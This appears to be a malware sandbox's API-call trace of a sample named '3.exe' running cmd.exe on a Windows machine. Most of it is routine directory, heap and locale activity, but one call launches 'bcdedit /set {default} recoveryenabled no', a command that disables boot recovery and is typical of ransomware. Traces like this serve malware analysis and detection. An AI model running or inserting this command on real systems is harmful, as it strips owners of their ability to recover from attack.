	[0033.287] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf490 | out: lpFindFileData=0x1cf490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x30b790
	[0033.287] FindClose (in: hFindFile=0x30b790 | out: hFindFile=0x30b790) returned 1
	[0033.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf490 | out: lpFindFileData=0x1cf490*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x30b790
	[0033.287] FindClose (in: hFindFile=0x30b790 | out: hFindFile=0x30b790) returned 1
	[0033.287] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0033.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf490 | out: lpFindFileData=0x1cf490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x30b790
	[0033.287] FindClose (in: hFindFile=0x30b790 | out: hFindFile=0x30b790) returned 1
	[0033.287] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.287] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0033.287] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0033.287] GetProcessHeap () returned 0x2f0000
	[0033.287] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ac80 | out: hHeap=0x2f0000) returned 1
	[0033.287] GetEnvironmentStringsW () returned 0x30b790*
	[0033.288] GetProcessHeap () returned 0x2f0000
	[0033.288] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30c280
	[0033.288] FreeEnvironmentStringsW (penv=0x30b790) returned 1
	[0033.288] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.288] GetProcessHeap () returned 0x2f0000
	[0033.288] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b720 | out: hHeap=0x2f0000) returned 1
	[0033.288] GetProcessHeap () returned 0x2f0000
	[0033.288] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4016) returned 0x30cd70
	[0033.288] GetProcessHeap () returned 0x2f0000
	[0033.288] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x68) returned 0x3095a0
	[0033.288] GetProcessHeap () returned 0x2f0000
	[0033.288] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd70 | out: hHeap=0x2f0000) returned 1
	[0033.288] GetConsoleOutputCP () returned 0x1b5
	[0033.288] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.288] GetUserDefaultLCID () returned 0x409
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e7b50, cchData=8 | out: lpLCData=":") returned 2
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf890, cchData=128 | out: lpLCData="0") returned 2
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf890, cchData=128 | out: lpLCData="0") returned 2
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf890, cchData=128 | out: lpLCData="1") returned 2
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3fa740, cchData=8 | out: lpLCData="/") returned 2
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3fa4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3fa460, cchData=32 | out: lpLCData="Tue") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3fa420, cchData=32 | out: lpLCData="Wed") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3fa3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3fa3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3fa360, cchData=32 | out: lpLCData="Sat") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3fa700, cchData=32 | out: lpLCData="Sun") returned 4
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e7b40, cchData=8 | out: lpLCData=".") returned 2
	[0033.289] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3fa4e0, cchData=8 | out: lpLCData=",") returned 2
	[0033.290] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0033.290] GetProcessHeap () returned 0x2f0000
	[0033.290] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x309680
	[0033.290] GetConsoleTitleW (in: lpConsoleTitle=0x309680, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.499] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.505] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0033.595] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0033.595] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0033.596] GetProcessHeap () returned 0x2f0000
	[0033.596] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30cd70
	[0033.596] GetProcessHeap () returned 0x2f0000
	[0033.596] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd70 | out: hHeap=0x2f0000) returned 1
	[0033.596] _wcsicmp (_String1="bcdedit", _String2=")") returned 57
	[0033.596] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4
	[0033.596] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4
	[0033.596] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7
	[0033.596] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7
	[0033.596] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16
	[0033.596] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16
	[0033.596] GetProcessHeap () returned 0x2f0000
	[0033.596] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x3098a0
	[0033.597] GetProcessHeap () returned 0x2f0000
	[0033.597] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304600
	[0033.597] GetProcessHeap () returned 0x2f0000
	[0033.597] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x56) returned 0x309960
	[0033.598] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1
	[0033.598] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="START") returned -17
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3
	[0033.599] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="START") returned -17
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15
	[0033.600] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1
	[0033.601] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11
	[0033.601] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4
	[0033.601] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7
	[0033.601] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16
	[0033.601] GetProcessHeap () returned 0x2f0000
	[0033.601] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x3099c0
	[0033.601] GetProcessHeap () returned 0x2f0000
	[0033.601] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x66) returned 0x309be0
	[0033.601] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1
	[0033.601] GetProcessHeap () returned 0x2f0000
	[0033.601] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x2f1320
	[0033.601] SetErrorMode (uMode=0x0) returned 0x0
	[0033.601] SetErrorMode (uMode=0x1) returned 0x0
	[0033.601] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f1330, lpFilePart=0x1cf030 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf030*="Desktop") returned 0x25
	[0033.602] SetErrorMode (uMode=0x0) returned 0x1
	[0033.602] GetProcessHeap () returned 0x2f0000
	[0033.602] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1320, Size=0x6c) returned 0x2f1320
	[0033.602] GetProcessHeap () returned 0x2f0000
	[0033.602] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1320) returned 0x6c
	[0033.602] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.602] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0033.602] GetProcessHeap () returned 0x2f0000
	[0033.602] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x309c50
	[0033.602] GetProcessHeap () returned 0x2f0000
	[0033.602] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x309d80
	[0033.609] GetProcessHeap () returned 0x2f0000
	[0033.609] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309d80, Size=0x12a) returned 0x309d80
	[0033.609] GetProcessHeap () returned 0x2f0000
	[0033.609] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309d80) returned 0x12a
	[0033.609] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.609] GetProcessHeap () returned 0x2f0000
	[0033.609] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x309ec0
	[0033.609] GetProcessHeap () returned 0x2f0000
	[0033.609] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309ec0, Size=0x7e) returned 0x309ec0
	[0033.609] GetProcessHeap () returned 0x2f0000
	[0033.609] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309ec0) returned 0x7e
	[0033.610] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.610] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1ceda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceda0) returned 0xffffffffffffffff
	[0033.611] GetLastError () returned 0x2
	[0033.611] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1ceda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceda0) returned 0xffffffffffffffff
	[0033.611] GetLastError () returned 0x2
	[0033.611] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1ceda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceda0) returned 0x309f50
	[0033.611] GetProcessHeap () returned 0x2f0000
	[0033.611] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x304630
	[0033.611] FindClose (in: hFindFile=0x309f50 | out: hFindFile=0x309f50) returned 1
	[0033.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1ceda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceda0) returned 0xffffffffffffffff
	[0033.611] GetLastError () returned 0x2
	[0033.611] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ceda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceda0) returned 0x309f50
	[0033.611] GetProcessHeap () returned 0x2f0000
	[0033.612] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x304630, Size=0x8) returned 0x309fb0
	[0033.612] FindClose (in: hFindFile=0x309f50 | out: hFindFile=0x309f50) returned 1
	[0033.612] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0033.612] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0033.612] GetConsoleTitleW (in: lpConsoleTitle=0x1cf2f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.612] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf0a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf068 | out: lpAttributeList=0x1cf0a8, lpSize=0x1cf068) returned 1
	[0033.612] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf0a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf058, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf0a8, lpPreviousValue=0x0) returned 1
	[0033.612] GetStartupInfoW (in: lpStartupInfo=0x1cf1c0 | out: lpStartupInfo=0x1cf1c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0033.612] GetProcessHeap () returned 0x2f0000
	[0033.612] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304630
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0033.612] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0033.613] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0033.613] GetProcessHeap () returned 0x2f0000
	[0033.613] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304630 | out: hHeap=0x2f0000) returned 1
	[0033.613] GetProcessHeap () returned 0x2f0000
	[0033.613] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308370
	[0033.613] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1
	[0033.615] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit  /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf0e0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit  /set {default} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf090 | out: lpCommandLine="bcdedit  /set {default} recoveryenabled no", lpProcessInformation=0x1cf090*(hProcess=0x54, hThread=0x50, dwProcessId=0x9c8, dwThreadId=0x9cc)) returned 1
	[0033.625] CloseHandle (hObject=0x50) returned 1
	[0033.625] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0033.625] GetProcessHeap () returned 0x2f0000
	[0033.625] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30c280 | out: hHeap=0x2f0000) returned 1
	[0033.625] GetEnvironmentStringsW () returned 0x30ac80*
	[0033.625] GetProcessHeap () returned 0x2f0000
	[0033.625] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30b770
	[0033.625] FreeEnvironmentStringsW (penv=0x30ac80) returned 1
	[0033.625] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0
	[0035.331] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1cefd8 | out: lpExitCode=0x1cefd8*=0x0) returned 1
	[0035.331] CloseHandle (hObject=0x54) returned 1
	[0035.420] _vsnwprintf (in: _Buffer=0x1cf248, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cefe8 | out: _Buffer="00000000") returned 8
	[0035.421] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0035.421] GetProcessHeap () returned 0x2f0000
	[0035.421] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b770 | out: hHeap=0x2f0000) returned 1
